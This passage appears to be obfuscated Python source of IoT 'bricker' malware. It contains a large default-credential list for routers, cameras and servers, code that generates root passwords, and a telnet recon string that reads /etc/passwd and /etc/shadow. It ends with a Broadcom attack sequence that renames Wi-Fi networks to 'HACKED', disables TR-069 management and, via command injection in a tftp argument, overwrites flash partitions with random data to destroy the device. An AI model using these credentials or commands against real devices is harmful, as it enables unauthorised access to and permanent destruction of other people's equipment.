"Admin/5up" , "admin/654321" , "admin/666666" , "admin/7ujMko0admin" , "admin/7ujMko0vizxv" , "admin/888888" , "admin/9999" , "admin/99999999" , "admin/abc123" , "admin/access" , "admin/admin" , "admin/ADMIN" , "Admin/admin" , "Admin/Admin" , "ADMIN/ADMIN" , "admin/admin00" , 'admin/admin01' , "admin/admin1" , "admin/admin123" , "admin/Admin123" , "admin/admin1234" , "admin/admin99" , "admin/Administration" , "admin/administrator" , "admin/adslolitec" , "admin/adslroot" , 'admin/adslnadam' , "admin/Ait" , "admin/AitbISP4eCiG" , "admin/articon" , "admin/asante" , "admin/Ascend" , "admin/asd" , "Admin/atc456" , "admin/atlantis" , "admin/aquario" , "admin/Aquario" , "admin/barricade" , "admin/bayandsl" , "admin/BGCVDSL2" , "admin/bintec" , "admin/cableroot" , "admin/cciadmin" , "admin/CenturyL1nk" , "admin/changeme" , "admin/cisco" , "admin/COadmin123" , "admin/comcomcom" , "admin/conexant" , "admin/c@ntv2000" , "admin/default" , "admin/detmond" , "admin/diamond" , "admin/dvr2580222" , "admin/epicrouter" , "admin/extendnet" , "admin/fliradmin" , "admin/giraff" , "admin/gvt12345" , "admin/h@32LuyD" , "admin/hagpolm1" , "admin/hello" , "admin/ho4uku6at" , "admin/hp.com" , "admin/htc" , "Admin/huawei.com" , "admin/imss7.0" , "admin/ip20" , "admin/ip3000" , "admin/ip400" , "admin/ironport" , "admin/isee" , "Administrator/" , "administrator/1234" , "Administrator/-%).3-" , "Administrator/3!play" , "Administrator/3ware" , "Administrator/admin" , "administrator/administrator" , "ADMINISTRATOR/ADMINISTRATOR" , "Administrator/buh" , "Administrator/changeme" , "administrator/d1scovery" , "Administrator/ganteng" , "Administrator/ggdaseuaimhrke" , "Administrator/letmein" , "Administrator/password" , "Administrator/pilou" , "Administrator/public" , "Administrator/smcadmin" , 'admin/2008x2BJAOTOtJK1' , 'admin/2008B6ByVO_utFJ3' , 'admin/2008x2CzFWOtTMWE' , "admin/ecom" , 'admin/GPAdm1n_w1max' , 'admin/hamlet' , 'admin/hayesadsl' , "admin/jvc" , "admin/JVC" , "admin/kont2004" , "admin/linga" , "admin/Meins" , "admin/meinsm" , "admin/michaelangelo" , "admin/michelangelo" , "admin/microbusiness" , "admin/motorola" , "admin/mu" , "admin/my_DEMARC" , "admin/nCwMnJVGag" , "admin/netadmin" , "admin/NetCache" , "admin/noway" , "admin/none" , "admin/OCS" , "admin/operator" , "admin/P@55w0rd!" , "admin/password" , "admin/pentagram" , "admin/pfsense" , "adminpldt/0123456789" , "adminpldt/12345676890" , "adminpldt/1234567890" , "admin/power" , "admin/Protector" , "admin/public" , "admin/pwp" , "admin/QwestM0dem" , "admin/radius" , "admin/rmnetlm" , "admin/root" , "admin/secure" , "admin/setup" , "admin/Sharp" , "admin/sitecom46" , "admin/skbiptv" , "admin/skb_wifi" , "admin/sky" , "admin/smallbusiness" , "admin/smcadmin" , "adminstat/OCS" , "adminstrator/changeme" , "Adminstrator/changeme" , "admin/superuser" , "admin/su@psir" , "admin/switch" , "admin/symbol" , "admin/synnet" , "admin/sysAdmin" , "admin/system" , "admintelecom/telecomadmin" , "admin/test" , "admin/test1" , 'admin/telus177' , "admin/trendchip" , "admin/true" , "admin/tsunami" , "adminttd/adminttd" , "admin/Uq-4GIt3M" , "adminuser/OCS" , "admin/utstar" , "adminview/OCS" , "admin/visual" , "admin/vnpt" , "admin/w2402" , "admin/wbox" , "admin/xad$l#12" , "admin/x-admin" , "admin/zhone" , "admin/zoomadsl" , 'admin/ZmqVfoSIP' , "ADMN/admn" , "adsl/adsl1234" , "ADSL/expert03" , "ADVMAIL/HP" , "ADVMAIL/HPOFFICE" , 'Afaq_shamel/stccpe_2007' , "Alphanetworks/firmware" , "Alphanetworks/wapnd03cm_dkbs_dap2555" , "Alphanetworks/wapnd04cm_dkbs_dap3525" , "Alphanetworks/wapnd15_dlob_dap1522b" , "Alphanetworks/wrgac01_dlob.hans_dir865" , "Alphanetworks/wrgg15_di524" , "Alphanetworks/wrgg19_c_dlwbr_dir300" , "Alphanetworks/wrgn22_dlwbr_dir615" , "Alphanetworks/wrgn23_dlwbr_dir300b" , "Alphanetworks/wrgn23_dlwbr_dir600b" , "Alphanetworks/wrgn28_dlob_dir412" , "Alphanetworks/wrgn39_dlob.hans_dir645" , "Alphanetworks/wrgn39_dlob.hans_dir645_V1" , "Alphanetworks/wrgn49_dlob_dir600b" , "Alphanetworks/wrgnd08_dlob_dir815" , "anonymous/any@" , "anonymous/Exabyte" , "Any/12345" , "apache/apache" , "apc/apc" , "arris/admin" , "ascend/ascend" , "at4400/at4400" , "baby/baby" , "backup/backup" , "bbsd-client/changeme2" , "bbsd-client/changeme2database" , "bbsd-client/NULL" , "bciim/bciimpw" , "bcim/bcimpw" , "bcms/bcmspw" , "bcnas/bcnaspw" , "bewan/bewan" , "bin/12345" , "blue/bluepw" , "browse/browsepw" , "browse/looker" , "cablecom/router" , "cablemodem/robotics" , "cac_admin/cacadmin" , 'caimore/caimore' , "cas/cascade" , "ccrusr/ccrusr" , "cellit/cellit" , "centos/centos" , "cgadmin/cgadmin" , "cisco/cisco" , "cisco/CISCO" , "Cisco/Cisco" , "citel/password" , "cjadmin/CJHV_ap_0601" , "client/client" , "cmaker/cmaker" , "comcast/1234" , "comcast/comcast" , "corecess/corecess" , "craft/craft" , "craft/craftpw" , "craft/crftpw" , "CRAFTSPERSON/ALC#FGU" , "csgoserver/csgoserver" , "CSG/SESAME" , "cusadmin/highspeed" , "cust/custpw" , "customer/none" , "dadmin/dadmin01" , "daemon/" , "daemon/daemon" , "davox/davox" , "debug/d.e.b.u.g" , "debug/synnet" , "default/" , "default/default" , "default/video" , "demo/demo" , "deploy/deploy" , "deskalt/password" , "deskman/changeme" , "desknorm/password" , "deskres/password" , "dev/dev" , "device/device" , "dhs3mt/dhs3mt" , "dhs3pms/dhs3pms" , "diag/danger" , "diag/switch" , "disttech/4tas" , "dlink/default" , "dlink/dlink" , "D-Link/D-Link" , "DLink/DLink" , "dm/telnet" , "draytek/1234" , "draytek/1234Admin" , "DTA/TJM" , "e250/e250changeme" , "e500/e500changeme" , "echo/echo" , "edimax/software01" , "eng/engineer" , "engmode/hawk201" , "enquiry/enquirypw" , "epicrouter/admin" , "Factory/56789Admin" , "FIELD/HPONLY" , "FIELD/HPP187 SYS" , "FIELD/HPWORD PUB" , "FIELD/LOTUS" , "FIELD/MANAGER" , "FIELD/MGR" , "FIELD/SERVICE" , "field/support" , "FIELD/SUPPORT" , "ftp_admi/kilo1987" , "ftp/ftp" , "ftp_inst/pbxk1064" , "ftp_nmc/tuxalize" , "ftp_oper/help1954" , "ftpuser/asteriskftp" , "ftpuser/ftpuser" , "Geardog/Geardog" , "GEN1/gen1" , "GEN2/gen2" , "git/git" , "GlobalAdmin/GlobalAdmin" , "Glo/Glo" , "guest/12345" , "guest/123456" , "guest/54321" , "guest/guest" , "Guest/Guest" , "guest/guest123" , 'guest/friend' , "guest/truetime" , "guest/user" , "guest/xc3511" , "hadoop/hadoop" , "halt/tlah" , "HELLO/FIELD.SUPPORT" , "HELLO/MANAGER.SYS" , "HELLO/MGR.SYS" , "HELLO/OP.OPERATOR" , "helpdesk/OCS" , 'home/zonnet' , "homebro/homebro" , "homeultera/homeultera" , "hsa/hsadb" , "hsa/hsasdb" , "hscroot/abc123" , "HTTP/HTTP" , "ibm/password" , "iclock/timely" , "inads/inads" , "inads/indspw" , "info/info" , "init/initpw" , "installer/installer" , "install/llatsni" , "install/secret" , "integrator/p1nacate" , "intel/intel" , "intermec/intermec" , "IntraStack/Asante" , "IntraSwitch/Asante" , "JDE/JDE" , "jenkins/jenkins" , "kermit/kermit" , "kpn/kpn-adsl" , "kroot/nespot" , "ktuser/homehub" , "ktuser/megaap" , "l2/l2" , "l3/l3" , "Linksys/admin" , "live/live" , "locate/locatepw" , 'localadmin/localadmin' , "login/0" , "login/1111" , "login/8429" , "login/access" , "login/admin" , "login/pass" , "login/password" , "login/user" , "lp/lp" , "LUCENT01/UI-PSWD-01" , "LUCENT02/UI-PSWD-02" , "m1122/m1122" , "MAIL/HPOFFICE" , "MAIL/MAIL" , "MAIL/MPE" , "MAIL/REMOTE" , "MAIL/TELESUP" , "maint/maint" , "maint/maintpw" , "maint/ntacdmax" , "maint/rwmaint" , "manage/!manage" , "Manage/Manage" , "Management/TestingR2" , "manage/password" , "Manager/" , "manager/admin" , "MANAGER/COGNOS" , "manager/friend" , "Manager/friend" , "MANAGER/HPOFFICE" , "MANAGER/ITF3000" , "manager/manager" , "Manager/Manager" , "MANAGER/SECURITY" , "MANAGER/SYS" , "MANAGER/TCH" , "MANAGER/TELESUP" , "manuf/xxyyzz" , "MD110/help" , "MDaemon/MServer" , "mediator/mediator" , "MegaVNN/MegaVNN" , "memotec/supervisor" , "Menara/Menara" , "mg3500/merlin" , "MGR/CAROLIAN" , "MGR/CCC" , "MGR/CNAS" , "MGR/COGNOS" , "MGR/CONV" , "MGR/HPDESK" , "MGR/HPOFFICE" , "MGR/HPONLY" , "MGR/HPP187" , "MGR/HPP189" , "MGR/HPP196" , "MGR/INTX3" , "MGR/ITF3000" , "MGR/NETBASE" , "MGR/REGO" , "MGR/RJE" , "MGR/ROBELLE" , "MGR/SECURITY" , "MGR/SYS" , "MGR/TELESUP" , "MGR/VESOFT" , "MGR/WORD" , "MGR/XLSERVER" , "MICRO/RSX" , "micros/micros" , "minecraft/minecraft" , "mlusr/mlusr" , "monitor/monitor" , "mother/fucker" , "mountsys/mountsys" , "mso/w0rkplac3rul3s" , "mtch/mtch" , "mtcl/mtcl" , "museadmin/Muse!Admin" , "mysql/mysql" , "naadmin/naadmin" , "nagios/nagios" , "NAU/NAU" , "netadmin/nimdaten" , "netgear/netgear" , "netman/" , "netman/netman" , "netopia/netopia" , "netrangr/attack" , "netscreen/netscreen" , "NETWORK/NETWORK" , "NICONEX/NICONEX" , "nms/nmspw" , "nobody/nobody" , "nobody/tmadmin" , "none/0" , "none/0Admin" , "none/4getme2" , "none/admin" , "none/admin00" , "none/ascend" , "none/backdoor" , "none/BRIDGE" , "none/Col2ogro2" , "none/Helpdesk" , "none/laflaf" , "none/Master" , "none/NetICs" , "none/Posterie" , "none/smcadmin" , "none/Super" , "none/xdfk9874t3" , "ONTUSER/SUGAR2A041" , "openlgtv/openlgtv" , "operator/1234User" , "operator/$chwarzepumpe" , "OPERATOR/COGNOS" , "operator/col1ma" , "OPERATOR/DISC" , "operator/mercury" , "operator/operator" , "OPERATOR/SUPPORT" , "OPERATOR/SYS" , "OPERATOR/SYSTEM" , "op/op" , "op/operator" , "oracle/oracle" , "osmc/osmc" , "patrol/patrol" , "PBX/PBX" , "PCUSER/SYS" , "PFCUser/240653C9467E45" , "piranha/piranha" , "piranha/q" , "pi/raspberry" , "PlcmSpIp/PlcmSpIp" , "pldtadmin/1234567890" , "poll/tech" , "Polycom/SpIp" , "pos/pos" , "postgres/postgres" , "PRODDTA/PRODDTA" , "PSEAdmin/$secure$" , "public/public" , "quser/quser" , "radware/radware" , "rapport/r@p8p0r+" , "rcust/rcustpw" , "readonly/lucenttech2" , "readwrite/lucenttech1" , "recovery/recovery" , "replicator/replicator" , "RMUser1/password" , "!root/" , "root/" , "root/0" , "root/0000" , "root/00000" , "root/000000" , "root/00000000" , "root/1" , "root/1001chin" , "root/1111" , "root/123" , "root/123123" , "root/1234" , "root/12341234" , "root/12345" , "root/123456" , "root/1234567" , "root/1234567890" , "root/1234qwer" , "root/1234User" , "root/20080826" , "root/2222222" , "root/22222222" , "root/33333333" , "root/321" , "root/33" , "root/333" , "root/3ep5w2u" , "root/4321" , "root/54321" , "root/5up" , "root/654321" , "root/666666" , "root/696969" , "root/7ujMko0admin" , "root/7ujMko0vizxv" , "root/888888" , "root/a6a7wimax" , "root/admin" , "root/Admin" , "root/admin99" , "root/admin_1" , "root/adminpassword" , "root/ahetzip8" , "root/alpine" , "root/anko" , "root/antslq" , "root/ascend" , 'root/asmcadmin' , "root/attack" , "root/avtech" , "root/awind5885" , "root/b120root" , "root/blender" , "root/calvin" , "root/camera" , "root/cat1029" , "root/changeme" , "root/Cisco" , "root/cms500" , "root/comcom" , "root/coolphoenix579" , "root/davox" , "root/default" , "root/dreambox" , "root/dreambox" , "root/fivranne" , "root/founder88" , "root/ggdaseuaimhrke" , "root/GM8182" , "root/GMB182" , "root/hi3518" , "root/huigu309" , "root/hunt5759" , "root/iDirect" , "root/ikwb" , "root/ikwd" , "root/indigo" , "root/inflection" , "root/ipcam_rt5350" , "root/juantech" , "root/jvbzd" , "root/klv123" , "root/klv1234" , "root/letacla" , "root/LSiuY7pOmZG2s" , "root/Mau'dib" , "root/maxided" , "root/oelinux123" , "root/openvpnas" , "root/oracle" , "root/orion99" , "root/pa55w0rd" , "root/pass" , "root/password" , "root/PASSWORD" , "root/permit" , "root/qwerty" , "root/realtek" , "root/reecam4debug" , "root/root" , "root/root123" , "root/root1234" , "root/root12345" , "root/root123456" , "root/ROOT500" , "root/root54321" , "root/samsung" , "root/Serv4EMC" , "root/skb_ipdcp" , "root/system" , "root/t0talc0ntr0l4!" , "root/tiger" , "root/tini" , "root/toor" , "root/tslinux" , "root/ttnet" , "root/u" , "root/ubnt" , "root/user" , 'root/vertex25ektks123' , "root/video" , "root/vizxv" , "root/Win1doW$" , "root/win1dows" , 'root/wind5885' , "root/W!n0&oO7." , "root/wyse" , "root/xc3511" , "root/xmhdipc" , "root/zlxx." , "root/zsun1188" , "root/Zte521" , "root/Zte521" , "root/zte9x15" , "ro/ro" , "router/router" , "RSBCMON/SYS" , "rwa/rwa" , "rw/rw" , "scmadmin/scmchangeme" , "scout/scout" , "security/security" , "Service/5678Service" , "service/service" , "service/smile" , "setup/changeme!" , "setup/changeme" , "setup/setup" , "simple/h3c" , "simple/huawei" , "smc/smcadmin" , "spcl/0" , "SPOOLMAN/HPOFFICE" , "steam/steam" , "storwatch/specialist" , "stratacom/stratauser" , "super/5777364" , "superadmin/Is$uper@dmin" , "superadmin/secret" , "superman/21241036" , "superman/superman" , "superman/talent" , "super/asong" , "super/super" , "super.super/master" , "super/surt" , "superuser/123456" , "superuser/123456special" , "superuser/admin" , "superuser/superuser" , "supervisor/PlsChgMe!" , "supervisor/PlsChgMe" , "supervisor/PlsChgMe1" , "supervisor/supervisor" , "supervisor/zyad1234" , "support/123456" , "support/admin" , "support/h179350" , "support/support" , "support/supportpw" , "susAdmin/Administrator" , "su/super" , "sweex/mysweex" , "Sweex/Mysweex" , "Symbol/Admin" , "sysadm/anicusc" , "sysadm/anicust" , "sysadmin/PASS" , "sysadmin/password" , "sysadmin/sysadmin" , "sysadm/sysadm/" , "sysadm/sysadm" , "SYSADM/sysadm" , "SYSDBA/masterkey" , "system/password" , "system/shell" , "system/sys" , "sys/uplink" , "target/password" , "teacher/password" , "teamspeak/teamspeak" , "tech/" , "tech/field" , "tech/tech" , "teladmin/telpwd" , "telco/telco" , "tele2/tele2" , "telecomadmin/******" , "telecomadmin/admintelecom" , "telecomadmin/n" , "telecomadmin/nE7jA%5m" , "telecomadmin/telecomadmin" , "telecom/telecom" , 'telekom/telekom' , "tellabs/tellabs#1" , "telnet/telnet" , "temp1/password" , "test1/test1" , "test/test" , "test/test1" , "test/test123" , "testuser/testuser" , "tiara/tiaranet" , "tiger/tiger123" , "tmadmin/tmadmin" , "tmuser/tmuser" , "tomcat/tomcat" , "topicalt/password" , "topicnorm/password" , "topicres/password" , "true/true" , "tw/tw" , "tw007/tw007" , "u/u" , "ubnt/ubnt" , "UBNT/UBNT" , "ubuntu/ubuntu" , "upgrade/Th0ms0n!" , "user3/1234" , "user3/12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678" , "USERID/PASSW0RD" , "user/admin" , "User/Kulacom" , "user/pass" , "user/password" , "User/Password" , "user/power" , "user/public" , "user/pu" , "user/tivonpw" , "user/user" , "usuario/usuario" , "vagrant/vagrant" , "vcr/NetVCR" , 'virgin/password' , "vnc/vnc" , "VNC/winterm" , 'vodafone/vodafone' , "volition/volition" , "vstarcam2015/20150602" , "vt100/public" , "VTech/VTech" , "vyatta/vyatta" , 'wbrnet/183$729' , "webadmin/1234" , "webadmin/webadmin" , "webmaster/webmaster" , "websecadm/changeme" , "wlseuser/wlsepassword" , "wlse/wlsedb" , "WP/HPOFFICE" , "Wproot/cat1029" , "wradmin/trancell" , "write/private" , "www/www" , "xbox/xbox" , "xd/xd" , "zabbix/zabbix" , "ZXDSL/ZXDSL" , "zyuser/1234" , 'zyad1234/zyad1234' , 'admin/vizxv' , 'supervisor/zyad5001' , 'Mroot/cat1029' , 'root/aquario' , 'admin/cat1029' , 'root/7ujMko0vizxv ' , 'root/ivdev' , 'guest1/guest1' , 'superadmin/' , 'support/user' , 'root/zyad5001' , 'default/antslq' , 'root/00' , 'admin/ipcam_rt5350' , 'root/1111111' , 'root/12345678' , 'root/333333' , 'superadmin/Is@dmin' , 'support/123' , 'admin/zyad5001' , 'admin/support' , 'root/smcadmin' , 'admin/pass' , 'root/qazxsw' , 'guest/' , 'root/3333333' , 'admin/12341234' , 'support/1234' , 'root/3' , 'root/!root' , '/1234' , 'admin/5up' , 'bin/' , 'netgear/admin' , 'root/oelinux1234' , 'admin/QuestM0dem' , 'admin/ttnet' , 'admin/service' , 'support/' , 'Admin/Password' , 'root/hdipc%No' , 'adm/' , 'super.super/' , 'administrator/changeme' , 'root/555555' , 'home/12345678' , 'admin/meinsm' , 'root/9999' , 'user/' , 'cusadmin/password' , 'user/123456' , 'root/1988' , 'root/jv' , 'root/555' , 'root/3ep5w2u' , 'admin/zhongxing' , 'admin/ca' , 'guest/VTech' , 'root/33333' , 'root/11111111' , 'root/root4321' , 'admin/adslnadam' , 'guest/1111' , 'enable/cisco' , 'admin/7772000' , 'login/comcast' , 'root/zhongxing' , 'test/' , 'adminstrator/meinsm' , 'support/12345' , 'Administrator/meinsm' , 'support/password' , 'sys/sys' , 'admin/vertex25ektks123' , 'admin/Win1doW$' , 'admin/xad#12' , 'Admin/smcadmin' , 'root/xc251' , 'root/support' , 'support/pass' , 'root/0P3N' , 'root/Administrator' , 'svn/svn' , 'admin/zsun1188' , 'user/1234' , 'root/3333' , 'admin/8D8E' , 'root/777' , 'admin/ztonpk' , 'Conf/admin' , 'root/asdfgh' , 'default/123456' , 'sysadm/admin' , 'root/alien' , 'support/telnet' , 'admin/44444' , 'alice/alice' , '0000/0000' , 'user/raspberry' , 'test/guest' , 'root/123qwe' , 'root/vI' , 'supervisor/enable' , '/clear123' , 'service/enable' , 'root/reecam4de' , 'cisco/default' , 'root/annie2012' , 'sh/shell' , 'osteam/5up' , 'root/wsxzaq' , 'root/xc3518' , 'admin/guest' , 'root/xc3515' , 'support/qrst' , '1/1' , 'root/VTech' , 'admin/7' , 'admin/qwerty' , 'netgear/VTech' , 'admin/263297' , 'root/letmein' , 'servlet/manager' , 'administrator/Amx1234!' , 'user/manager' , 'VUTS/VUTS' , 'admin/444444' , '/0000' , 'admin/Administrator' , 'root/111111' , 'netgear/Administrator' , 'root/99999' , 'netgear/root' , 'root/qwertyuiop' , '/root' , 'root/55555555' , 'root/12' , 'support/enable' , '/TRWW' , 'guest/enable' , 'support/root' , 'admin/flvbyctnb' , 'root/yankeessam40:1961' , 'test/testing' , 'pnadmin/pnadmin' , 'sphinx/sphinx' , 'admin/ghbdtn' , 'admin/FERUM' , 'admin/amvqnekk' , 'admin/airlive' , 'netgear/password' , 'admin/9' , 'webstar/webstar' , 'root/2' , 'support/cisco' , 'admin/3333333' , 'johnny/johnny' , 'login/guest' , 'xbmc/bananapi' , 'ahetzip8/ahetzip8' , 'support/vagrant' , 'mgmt/mgmt' , 'admin/0508780503' , 'admin/vagrant' , 'guest/password' , 'admin/99' , 'admin/00' , 'login/manager' , 'Administrator/Administrator' , 'user/pi' , 'admin/adminstrator' , 'root/22' , 'root/hi3511' , 'root/public' , 'cisco/password' , 'admin/7BBC' , 'admin/22' , 'admin/RTadmin1979' , 'admin/123456780' , 'admin/<>' , 'cisco/support' , 'admin/2w4f6n8k' , 'admin/Ferrum' , 'guest/netgear' , 'root/7777777' , 'netgear/123456' , 'admin/biyshs9eq' , 'realtek/realtek' , 'login/test' , 'root/9999999' , 'admin/99999' , 'login/telnet' , 'admin/tech' , 'admin/&' , 'postgres/postgrespass' , '/enable' , 'admin/D-Link' , 'netgear/1234' , 'administrator/password' , 'admin/1q2w3e' , 'cisco/guest' , 'bananapi/bananapi' , 'root/44' , 'ftp/password' , 'login/cisco' , 'admin/oelinux123' , 'user/login' , 'root/telnet' , 'admin/hsparouter' , 'root/grouter' , 'Adminstrator/smcadmin' , 'support/Administrator' , 'admin/9999999' , 'guest/ubnt' , 'root/pi' , 'cpanel/cf46e3bdb4b929f1' , 'root/abc123' , 'tyler/tyler' , 'admin/adsladmin' , 'root/comcast' , 'root/666' , 'ziggo/draadloos' , 'guest/xc3611' , 'ubnt/ubntenable' , 'admin/cat' , 'maint1/sx2000' , 'guest/support' , 'root/8888888' , 'share/share' , 'user/Administrator' , 'admin/P' , 'root/openssh' , 'admin/beeline2013' , 'admin/szt' , 'dm3500/merlin' , 'larry/larry' , 'root/88888' , 'LocalService/DV5800' , 'airlive/airlive' , 'admin/user' , 'root/3e2w1q' , 'mt7109/wimax' , 'admin/letmein' , 'guest/pass' , 'admin/999999999' , 'administrator/123' , 'support/guest' , 'daniel/daniel' , 'prueba/prueba' , 'guest/pi' , 'login/D-Link' , 'jeff/jeff' , 'root/cisco' , 'root/22222' , 'user/vizxv' , 'motherfucker/enable' , 'admin/1234root' , 'root/zlxx' , 'admin/6' , 'netgear/default' , 'admin/555555' , 'admin/raspberry' , 'office/office' , 'admin/ERRU$' , 'svn/123456' , 'admin/5' , 'admin/zyxel' , 'root/bananapi' , 'admin/12' , 'uucp/uucp' , 'test/123456' , 'download/download' , 'ubnt/enable' , 'tst/tst' , 'cisco/1234' , 'admin/netgear' , 'root/77777777' , 'ems/ems' , 'admin/00000000' , 'test/testtest' , 'login/Administrator' , 'guest/comcast' , 'admin/asus' , 'support/netgear' , 'rob/rob' , 'adsl/realtek' , 'admin/555555555' , 'cisco/12345' , 'admin/Admin' , '/private' , 'secret/secret' , 'cisco/user' , 'admin/5555555' , 'user/D-Link' , 'super/APR@xuniL' , 'admin/33333333' , 'engineer/amplifier' , 'superdba/admin' , 'nuucp/nuucp' , 'admin/adsl' , 'admin/beeline' , 'admin/ipcamera' , 'default/user' , 'root/102030' , 'root/nosoup4u' , 'sh/sh' , 'admin/internet' , 'admin/free' , 'noc/noc' , 'root/222' , '______/______' , 'QQQQQQ/QQQQQQ' , 'kevin/kevin' , 'root/qkrrud7502' , 'root/66666666' , 'root/8' , 'ajay/ajay' , 'netgear/pi' , '/admin' , 'kyivstar/kyivstar' , 'anonymous/anonymous' , 'guest/vizxv' , 'webftp/webftp123' , 'root/t' , 'gitlab/gitlab' , 'root/Passw0rd' , 'support/default' , '1234/1' , '3500/24' , 'root/enable' , 'password/enable' , 'USER/x' , 'netgear/D-Link' , 'www-data/123456' , 'admin/999' , 'hector/hector' , 'admin/login' , 'root/88' , 'openerp/openerp' , 'cpanel/0fc0f17d6087680e' , '/1' , 'root/4444444' , 'thomas/thomas123' , '/hewlpack' , 'admin/iyeh' , 'admin/66666' , 'admin/3333' , 'user/live' , 'maria/maria' , 'admin/juklop' , 'root/cat' , 'root/6y5t4r3e2w1q' , 'admin/passw0rd' , 'ftpuser/ftppass' , 'WEBADM/password' , 'root/222222' , 'root/PWLA-root' , 'admin/airocon' , 'admin/gfhjkm' , 'cmsftp/cmsftp' , 'cisco/admin' , '/XCA2Y12U71' , 'mike/mike123' , 'root/uClinux' , 'root/seiko2005' , '/netadmin' , 'bill/bill' , 'root/d' , 'admin/55' , 'root/v' , 'root/LZEDADM' , 'root/welc0me' , 'root/sh' , 'ashish/ashish' , 'root/555555555' , 'root/raspberry' , 'admin/33' , 'netgear/12345' , 'joe/joe' , 'root/syste' , 'admin/comcast' , 'sysadmin/superuser' , 'walter/walter' , 'guest/abc123' , 'test/12345' , 'root/operator' , 'cisco/123456' , 'test/test1234' , 'admin/VTech' , 'admin/enable' , 'web/web123' , '/ascend' , 'root/12190091' , 'admin/a' , 'lms/lms' , 'sandeep/sandeep123' , 'admin/7777' , 'super/zxcvbnm,.' , 'cubrid/cubrid' , 'portal/portal' , 'user/user123' , 'ftptest/ftptest' , 'support/cat' , 'user/default' , 'root/4444' , 'user/test' , 'admin/adminadmin' , 'root/t1789' , 'test/tester' , 'www-data/www-data' , 'root/rasplex' , 'root/<>' , 'admin/ubnt' , 'admin/6666666666' , '1234/enable' , 'netbrain/$ilv3r*2017' , 'default/enable' , 'verwalter/verwalter' , 'login/1234' , 'admin/e2b81d_1' , 'vivek/vivek' , 'admin/Kendalf9' , 'root/999999' , 'root/6666666' , 'admin/mts' , 'jim/jim123' , 'jenkins/jenkins123' , 'netgear/telnet' , 'test/123123' , 'admin/qweasdOP' , 'mts/mts' , 'login/support' , 'admin/radmin' , 'teste/teste' , 'cisco/comcast' , 'root/team2' , 'debug/debug' , 'moodle/moodle123' , 'root/G' , 'xbmc/xbmc' , 'deployer/deployer' , 'rptic/raspberry' , '500/500' , 'koha/koha123' , 'admin/inet' , 'jose/jose' , 'admin/online' , 'TKD/o0mb6mff' , 'root/0000000' , 'netman/n' , 'php5/a82f8443132f0fda' , 'root/xbmc' , 'support/test' , 'cloud/cloud' , 'root/openelec' , 'admin/590152' , 'odoo/odoo' , 'login/login' , 'admin/11' , 'sybase/sybase' , 'biz/biz123' , 'guest/manager' , 'root/r' , 'root/Admin123' , 'ingres/ingres' , 'ubnt/1234' , 'admin1/enable' , 'admin/nimda' , 'jboss/jboss' , 'proftpd/proftpd' , 'finance/finance' , '666666/enable' , 'lucas/lucas' , 'library/library' , 'root/dup' , 'support/support123' , 'ncuser/ncuser' , 'root/server' , 'guest/cisco' , 'train/train' , 'admin/dPZb4GJTu9' , 'admin/66' , 'admin/Ferum' , 'root/pfsense' , 'jack/jack' , 'cisco/login' , 'root/waldo' , 'manager/-!.!\'%2' , '/3ascotel' , 'deployer/deploy' , 'admin/666' , 'test/1234' , 'admin/sh' , 'toto/toto' , 'mysql/123456' , 'newadmin/newadmin' , 'ftp/123456' , 'screen/screen' , 'cisco/toor' , 'root/444444' , 'temp/temp' , 'root/tl789' , 'root/111' , 'Administrator/enable' , 'openfiler/password' , 'root/1q2w3e4r' , 'git/git123' , 'cpanel/cae0dd132d2d89f5' , 'mobile/alpine' , 'root/anni2013' , 'support/1qaz2wsx' , 'admin/manager' , 'admin/44' , 'admin/enable36291' , 'ftpuser/123456' , 'mgts/mtsoao' , 'userftp/userftp' , 'user/dreambox' , 'user/enable' , 'host/dnnhost' , 'admin/qazxsw' , 'TKD/5un2na0o' , 'admin/rombik1' , 'openvpn/openvpn' , 'guest/1234' , 'git/test1234' , 'admin/adn8pzszk' , 'default/4U' , 'superuser/asante' , 'icinga/icinga' , 'sshd/sshd' , 'enable/show' , ] if 90 - 90: IIiIIiIii1I if 9 - 9: O0oo0OOOOO00 % Oooo - oOoO0Ooo % O0oo0OOOOO00 O0O = "SPLTX" if 81 - 81: Ii11i1iIi / Ii11i1iIi * Oo0 / o0oooooO / IIiIii1iI iII11I = [ 'TELCO' , 'inet' , 'zyxel' , 'ZYX' , 'zyx' , 'huawei' , 'LZE' , 'lze' , 'qualcomm' , 'dlink' , 'broadcom' , 'router' , 'DLink' , 'main' , 'wan' , 'global' , 'cpa' , 'customer' , 'linux' , 'default' , 'cisco' ] o00 = [ '%s' % ( random . randint ( 100 , 999 ) ) , '%s' % ( random . randint ( 10 , 99 ) ) , '%s' % ( random . choice ( '%#!@_=;' ) ) , '%s' % ( random . choice ( 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' ) ) ] o00OooOO0oooo = [ 'admin' , 'ADMIN' , 'support' , 'mgmt' , 'manager' , 'adm' , 'ADM' , 'root' , 'account' , 'cs' , 'corporate' , 'business' , 'fiber' , 'adsl' , 'vdsl' , 'wifi' , 'administrator' , 'Administrator' , 'default' , 'factory' ] OoO0 = 'root/' + random . choice ( iII11I ) + random . choice ( o00 ) + random . choice ( o00OooOO0oooo ) if 91 - 91: oOOoO00oo0 / Ii11i1iIi oOoOOoooo0 = "w\nuname -a\nls -alF /etc/\ncat /etc/passwd\ncat /etc/shadow\ncat /proc/version\n" ; if 55 - 55: OOOoOooO / oOOo0000o + oOoO0Ooo ooO0o = [ [ "broadcom" , ".*" , "(telnetd.*error.*processInput.*unrec.*|BCM96|ls -alF /etc/: not found)" , 'lan config --ipaddr primary 10.1.2.3 255.255.255.248' , '' , 'wlan config --ssid "HACKED: DEFAULT PASSWORD"' , '' , 'wlan config --enable 0' , '' , 'wlan config --ssid primary "HACKED: DEFAULT PASSWORD"' , '' , 'wlan config --status primary disable' , '' , 'save' , '' , 'tr69cfg --inform disable' , '' , 'tr69cfg --connreq disable' , '' , 'tr69cfg --password HACKED' , '' , 'tr69cfg --intf HACKED' , '' , 'tr69cfg --info' , '' , 'tr69c ConnReqPort 31351' , '' , 'save' , '' , 'tftp -p -t f -f `cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root;route del default` 127.0.0.1' , '' , 'tftp -p -t c -f `cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root;route del default` 127.0.0.1' , '' , 'nslookup 